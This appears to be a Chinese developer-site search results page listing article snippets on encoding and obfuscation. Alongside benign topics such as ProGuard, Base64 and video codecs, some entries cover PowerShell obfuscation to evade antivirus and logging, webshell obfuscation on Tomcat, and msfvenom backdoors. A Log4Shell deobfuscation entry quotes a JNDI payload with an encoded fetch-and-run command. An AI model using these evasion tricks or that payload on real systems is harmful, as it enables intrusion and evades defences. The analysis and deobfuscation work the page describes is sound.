- 综合排序
- 最热优先
- 最新优先
- 来自专栏FreeBuf
Powershell编码与混淆
在powershell中最常使用的编码就是base64编码了,今天主要说一下Invoke-Obfuscation 这个powershell混淆编码框架,这也是著名的组织APT32 (海莲花)经常使用的一个工具 输入ps 然后选择67 (67代表隐藏执行与绕过执行限制) 就会生成完整的混淆与编码后的命令 ? 输入show options 打开设置选项 ? 进行多次编码 在进行第一次编码后然后输入要编码的类型进行二次编码 ? 选项中可以看到使用了2次编码命令 undo取消最近一次的编码命令/reset取消所有的编码命令 ? 在系统日志中(%systemroot%\System32\winevt\powershell.evtx),通过混淆与编码后的powershell命令更加增加了溯源的难度 ? 总结: 在windows环境下,使用powershell的攻击者将会越来越多,通过对powershell 编码与混淆,可以有效的绕过一些杀软检测并且更加具备隐藏的目的。
1.8K70发布于 2018-02-26 - 来自专栏实用技术
url编码,只对汉字有效
public static String toUtf8String(String s) { StringBuffer sb = new StringBuffer(); for (int i = 0; i < s.length(); i++) { char c = s.charAt(i); if (c >= 0 && c <= 255) { sb.append(c); } e
1.4K20编辑于 2022-02-10 - 来自专栏红蓝对抗
哥斯拉Godzilla | 基于tomcat webshell的有效通杀混淆方式&通用的java代码混淆
1.5 编码的别名问题 一种编码支持多个别名,都可用于webshell的混淆,比如:CP290编码存在多个别名,均可用于表示CP290编码进行内容编码: ibm290 ibm-290 csIBM290 xml格式的声明和识别 xml格式的声明中最主要是标签中的encoding属性,其决定了内容的编码如:<? Jdk8+Tomcat8.5下支持900+种编码,可用于混淆webshell的有十余种 可以用编码的别名,达到的编码效果是等效的 tomcat8下,如果有bom头会根据bom头来决定内容的编码(即:需要在文件内容前面插入对应编码的 4.jsp的文件大小要大一倍 原文件和编码后的文件,使用sublime工具打开,如下图(可以看到编码后的shell内容还是可见的): 010editor打开5.jsp查看二进制数据: 上传tomcat可以解析 concatenateStrings(bean.getScriptlets()); } return new String[]{declaration,scriptlet}; } //处理全局代码块和通讯代码块的混淆逻辑
1.5K10编辑于 2024-01-23 - 来自专栏向治洪
android混淆和反编译
混淆 Android Studio: 只需在build.gradle(Module:app)中的buildTypes中增加release的编译选项即可,如下:
- 1
同样,生成签名时代码就会被混淆 混淆语法 请参考${sdk.dir}/tools/proguard/proguard-android.txt文件,需要注意的是文件中虽然有了不混淆Parcelable的语句,如下: <code class- 4
但是还是要自己把继承自Parcelable的类写进来避免混淆87780发布于 2018-02-01 - 来自专栏用户6884826的专栏
硬编码和软编码
一.硬编码 硬编码就是直接将数据写入到代码中进行编译开发。 以上两种情况都是硬编码。 硬编码耦合度高,不利于模块拆分然后进行协同开发。 同时由于硬编码是直接将操作数据的代码片段,或者读取配置文件片段嵌入到代码中,如果我们是C/S开发,我们每次更新数据操作方式和更新配置文件位置时候,都需要重新部署项目,同时客服端也需要重新安装软件,非常不友好 二.软编码 软编码就是讲数据和源代码进行解耦,提高程序开发效率。 对于上文中的第二个问题,我们可以采用MVC框架的设计模式,将jsp拆分为前端HTML代码和后端的逻辑代码,这样有利于提高程序的开发效率和测试效率。
2.4K10发布于 2021-07-08 - 来自专栏DeepHub IMBA
LeViT-UNet:transformer 编码器和CNN解码器的有效整合
levi - unet[2]是一种新的医学图像分割架构,它使用transformer 作为编码器,这使得它能够更有效地学习远程依赖关系。 LeViT-UNet架构 levi - unet的编码器使用LeViT块构建,设计用于高效和有效地学习全局特征。解码器是使用卷积块构建的。 编码器从多个分辨率的输入图像中提取特征映射。 LeViT编码器 编码器采用LeViT[1],主要由两个部分组成:卷积块和变压器块。卷积块通过对输入图像应用4层3x3卷积(步幅为2)来执行分辨率降低。 在编码器的最后阶段将来自卷积块和变压器块的特征连接起来。这使得编码器具有本地和全局特性。局部特征对于识别图像中的小而详细的物体很重要,而全局特征对于识别图像的整体结构很重要。 通过结合局部和全局特征,编码器能够生成更准确的分割。 根据输入第一个transformer块的通道数量,开发了3个LeViT编码器:levi -128s, levi -192和levi -384。
76320编辑于 2023-08-30 - 来自专栏Android Camera开发
硬编码 和 软编码
一、硬编码 硬编码,就是指有专门的硬件模块编码来负责编码。 举个例子,Android手机上,我们常见的高通、MTK、海思等芯片平台,它们都会有专门的编码模块,比如dsp模块等。 硬编码,有啥优点呢? 1、快,这个快是相对于软编码而言; 2、省电、功耗低; 缺点: 1、兼容性稍差, 二、软编码 软编码,就是指通过软件让CPU来进行编码处理。比如我们经常说的ffmpeg,就是用来进行软编码的。 优点: 1、兼容性好; 缺点: 1、耗资源,需要耗费cpu资源; 2、效率低,相对于硬编码而言。 1)灵活性高,能够适应不同的音视频格式和压缩率。 3)由于是通过软件算法进行解码,因此可以更容易地进行升级和优化。 1)相比硬解码,软解码需要消耗更多的 CPU 资源,可能导致设备过热、 电池寿命降低等问题。 总结: 在实际的应用开发中,开发者可以根据设备性能和支持情况来选择软编码或硬编码方式。能硬编码优点选择硬编码。
1.1K10编辑于 2024-01-29 - 来自专栏White OWL
Ox4Shell工具-轻松反混淆 Log4Shell 有效负载
描述 自 Log4Shell 漏洞 (CVE-2021-44228) 发布以来,创建了许多工具来混淆 Log4Shell 有效负载,使安全工程师的生活成为一场噩梦。 该工具旨在解开经过混淆的 Log4Shell 有效负载的真实内容。 例如,考虑以下经过混淆的有效负载: ${zrch-Q(NGyN-yLkV:-}${j${sm:Eq9QDZ8-xEv54:-ndi}${GLX-MZK13n78y:GW2pQ:-:l}${ckX:2@BH 例如,考虑以下混淆的有效负载: ${jndi:ldap://1.1.1.1:1389/Basic/Command/Base64/KHdnZXQgLU8gLSBodHRwOi8vMTg1LjI1MC4xNDguMTU3OjgwMDUvYWNjfHxjdXJsIC1vIC0gaHR0cDovLzE4NS4yNTAuMTQ4LjE1Nzo4MDA1L2FjYyl8L2Jpbi9iYXNoIA encoding: UTF-8", "hw": "processors: 1, architecture: amd64-64" } } 例如,我们可以使用 Ox4Shell 的模拟功能对以下有效负载进行反混淆
62220编辑于 2022-09-27 - 来自专栏bisal的个人杂货铺
混淆的行迁移和行链接
这里就引出了行迁移和行链接这两个容易混淆的概念,整理一下,算是让自己重新认识下。 当更新的记录导致记录大于一个数据块时,就会同时发生行迁移和行链接,因此行迁移是一种特殊的行链接。 行迁移对于全表扫描,没影响,因为第一个数据块只有rowid,没有数据,所以会被跳过,只会扫描第二个数据块,但是使用rowid的扫描,需要读取迁移前(迁移后数据块的rowid)和迁移后(行数据)的两个数据块 从现象上看,发生行链接和行迁移,可能导致INSERT、UPDATE和通过索引执行的SELECT操作缓慢,原因就是需要消耗更多的IO,读取更多数据块。 其实无论如何设计表,行链接和行迁移,或许都可能发生,此时就看多消耗的这些IO,以及锁的开销,能不能成为性能问题的主要矛盾了。
1.2K20发布于 2019-06-22 - 来自专栏iOS打包,上架知识大全
代码混淆的原理和方法详解
代码混淆的原理和方法详解摘要移动App的广泛使用带来了安全隐患,为了保护个人信息和数据安全,开发人员通常会采用代码混淆技术。本文将详细介绍代码混淆的原理和方法,并探讨其在移动应用开发中的重要性。 为了应对潜在的安全威胁,开发人员需要采取有效措施来保护应用程序的安全性。代码混淆作为一种重要的安全技术,可以有效提升应用程序的安全性,本文将对代码混淆的原理和方法进行深入探讨。 通过对已发布的程序进行重新组织和处理,混淆后的代码具有与原始代码相同的功能,但很难被反编译和理解。代码混淆有效地提高了应用程序的反向工程难度,从而提升了安全性。 ,以增加代码的复杂性和混淆程度。 总结代码混淆作为一种重要的安全技术,在移动应用开发中具有不可替代的作用。通过字符串加密、方法名和类名混淆以及程序结构的混淆加密等方法,可以有效提高应用程序的安全性,降低被逆向破解的风险。
76910编辑于 2023-11-30 - 来自专栏前端重点笔记
易混淆的table列表和dl表格
首先我们使用dl(definition list-自定义列表)标签来容纳整个数据结构,然后我们使用dt(自定义标题)标签和dd(自定义描述)标签来容纳数据中的标题和内容。 传统的table数据列表我们要为每行添加tr标签,然后还要在其中为标题和数据各加一个th和td标签。 总结:比较dl和table数据列表,dl列表更加简洁,但是table表格仍然被很多人用来作为网页中数据表现的必需品,比如个人信息数据列表等。 当然,table也有它的用武之地,那就是很大数据量的数据表,但是小型的数据列表和表单完全可以不使用table哦!
93040发布于 2019-09-18 - 来自专栏玄魂工作室
Msfvenom后门重新学习与分析-windows篇
什么是攻击荷载: Payload:目标系统上渗透成功后执行的代码 msfvenom命令行选项如下: 使用如下命令可以查看恶意代码详细信息: Info 荷载/编码/指令 下面我们逐条分析命令的使用 1)- -+----------------------------------------- Framework NOPs (9 total) ======================== 详细查询每个有效荷载的信息 ]编码器使用 win2003(32位) -e x86/shikata_ga_nai,无法反弹shell,需要多实验不同系统,次编码跨平台 6)-a, - -arch <架构>的架构使用 9) -i,--iterations 编码次数的次数,以有效负载进行编码 10)-c,--add代码<路径>指定一个额外的win32 shellcode的文件 首先生成一个shellcode 然后监听 把两个后门端口改成一样的时候,可以链接到,却无法反弹shell 剩下 -x与-k参数后续更新: -x,--template <路径>指定一个自定义的可执行文件作为模板使用 -k,--keep保存模板行为和有效载荷为一个新的线程注入
2.5K90发布于 2018-04-12 - 来自专栏玄魂工作室
Msfvenom后门重新学习与分析-windows篇
什么是攻击荷载: Payload:目标系统上渗透成功后执行的代码 msfvenom命令行选项如下: 使用如下命令可以查看恶意代码详细信息: Info 荷载/编码/指令 下面我们逐条分析命令的使用 1)- -+----------------------------------------- Framework NOPs (9 total) ======================== 详细查询每个有效荷载的信息 ]编码器使用 win2003(32位) -e x86/shikata_ga_nai,无法反弹shell,需要多实验不同系统,次编码跨平台 6)-a, - -arch <架构>的架构使用 9) -i,--iterations 编码次数的次数,以有效负载进行编码 10)-c,--add代码<路径>指定一个额外的win32 shellcode的文件 首先生成一个shellcode 然后监听 把两个后门端口改成一样的时候,可以链接到,却无法反弹shell 剩下 -x与-k参数后续更新: -x,--template <路径>指定一个自定义的可执行文件作为模板使用 -k,--keep保存模板行为和有效载荷为一个新的线程注入
1.5K80发布于 2018-04-12 - 来自专栏媒矿工厂
视频编码中编码和计算效率对比
演讲主题是视频编码中编码和计算效率对比。 此次演讲主要包括五个部分: 1. 视频编码的历史回顾 2. 视频编码中的多线程 3. 时间分片作为视频编码的“均衡器” 4. 实验结论 作者首先简单回顾了以下视频编码的历史发展:从一开始面向专业内容的编码,到面向消费者视频内容的编码,进而发展为面向流媒体的云端编码,编码面向的对象也从单片发展为块和镜头。 现存的视频编码多线程处理方式有:帧级并行处理,片级并行处理,波前并行处理和开环并行处理等方式。并且作者对他们进行了一一介绍。 这也就是第三部分的主题,合理利用时间分片作为视频编码的均衡器。并且作者还对云端视频编码这一应用场景,总结了不同层级的并行处理的优缺点。 接着作者介绍了他进行的一组实验,并给出了具体的实验设置。 作者从质量预设,CPU负载,比特率和计算复杂度的权衡等方便给出了实验结果。
1.2K50发布于 2020-03-19 - 来自专栏媒矿工厂
HVS和感知编码
Chris首先介绍了自己的履历,从一开始工作于ISP到后来进入广播领域,再到接触感知编码等。 Chris认为,利用人类的视觉认知特性进行视频编码压缩,实现视觉近乎无损的编码方式可以算作是一个“魔术”。 而相对的,Chris说道,客观质量评价,例如传统的psnr、ssim等都有很多缺陷,所以会导致使用它们指导编码时可能得不到很好的效果。 接下去的一个问题是关于动画编码的,动画编码与真实世界图像的编码有很大不同,一般认为动画的纹理比较简单,但是有些特殊情况也会对编码器提出很高的要求,所以有时需要专门针对动画编码的相关编码器进行特殊配置。 随后,Chris介绍了他们自己正在开发的基于x264等编码器的播放器,在编码方面,引入了感知方面的码率分配机制等。 最后,他们也谈到了关于内容自适应编码和自适应码率方面的一些问题。
96020发布于 2020-06-01 - 来自专栏进击的Coder
总结一些网站加密和混淆技术
接口参数加密 为了提升接口的安全性,客户端会和服务端约定一种接口校验方式,一般来说会使用到各种加密和编码算法,如 Base64、Hex 编码,MD5、AES、DES、RSA 等加密。 ,它可以使得你的 JavaScript 代码经过混淆后难以被复制、盗用,混淆后的代码具有和原来的代码一模一样的功能。 另外 renameGlobals 这个参数还可以指定是否混淆全局变量和函数名称,默认为 false。 特殊编码 另外还有一些特殊的工具包,如使用 aaencode、jjencode、jsfuck 等工具对代码进行混淆和编码。 示例如下: var a = 1 jsfuck 的结果: [][(! 以上便是对 JavaScript 混淆方式的介绍和总结。总的来说,经过混淆的 JavaScript 代码其可读性大大降低,同时防护效果也大大增强。
4.2K70发布于 2020-05-08 - 来自专栏Coding+
编码、加密和 Hash
Hash 值(MD5、SHA2等),例如网站登录时,可以只保存用户密码的 Hash 值,每次登录时只需将密码的 Hash 值和数据库中的 Hash 值作比较,网站无需存储用户密码,这样在网站数据被盗时可以有效防止撞库等风险 一些如uuencode的其他编码方法,和之后BinHex的版本使用不同的64字符集来代表6个二进制数字,但是不被称为Base64。 image.png 用途 将二进制数据的存储方式和传输途径进行了扩充(例如可以把图片经过编码保存到文本文件、可以通过聊天对话框或短信形式发送、可以在 URL 中加入简单的二进制数据) 普通的字符串在经过 Base64 编码后结果会变得肉眼不可读,因此适用于一定条件下的防偷窥 缺点 因为自身原理(6 位变 8 位),因此每次 Base64 编码之后,数据都会增大约 1/3,所以会影响存储和传输性能。 变种:Base58 比特币使用的编码方式,去掉了 Base64 中的数字 “0”,大写字母 “O”,大写字母 “I”,和小写字母 “l”,以及 “+” 和 “/” 符号,用于比特币地址的表示。
3.4K20发布于 2018-11-20 - 来自专栏知识分享
关于编码和字库
先看一下 相信大家都听说过 GB2312,实际上就是用16进制来表示咱中国人的符号和字,咱主要说一下字 可以看一下 https://blog.csdn.net/halchan/article/details GBK包含GB2312 是在GB2312之上进行了补充 实际上就是把每一个汉字用两个16进制表示, 0xB0,0xA1 就表示 啊 好了这里就说完了,现在看如何把0xB0,0xA1和字库联系上 现在说处理芯片是如何做的 假设用的GBK编码 假设数据是从存储芯片的0地址开始存的 我要显示 "丂" 是不是只需要从0地址开始取,取32个字节然后用这32个字节控制小灯就可以了 可是咱们让含有字库的芯片显示
1.1K60发布于 2019-02-13 - 来自专栏前端开发
不要混淆 typeof 的值运算和类型运算
它们是不一样的,不要混淆。 JavaScript 的 typeof 遵守 JavaScript 规则,TypeScript 的 typeof 遵守 TypeScript 规则。
37510编辑于 2024-05-29 - 来自专栏乌鸦安全
Invoke-Obfuscation混淆免杀过360和火绒
360和火绒,但是过不了Windows Defender 1. TOKEN支持分部分混淆 STRING整条命令混淆 COMPRESS将命令转为单行并压缩, ENCODING编码 LAUNCHER选择执行方式 本文只讨论ENCODING编码方法 2. msfvenom 混淆大法 设置需要混淆的木马文件路径 set scriptpath C:\0_poweshell\msf-crow.ps1 ? 4. 第一种混淆 1 encoding 选择第一种方法混淆 1 ? windows Defender msfvenom生成powershell攻击脚本和Invoke-Obfuscation混淆方法在Encoding模式下的静态查杀效果: ? ? ps:以上环境都联网状态下,360采用云查杀 同样 msfvenom生成powershell攻击脚本和Invoke-Obfuscation混淆方法在Encoding模式下的动态上线查杀效果: ? ?
1.6K20发布于 2021-08-05
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号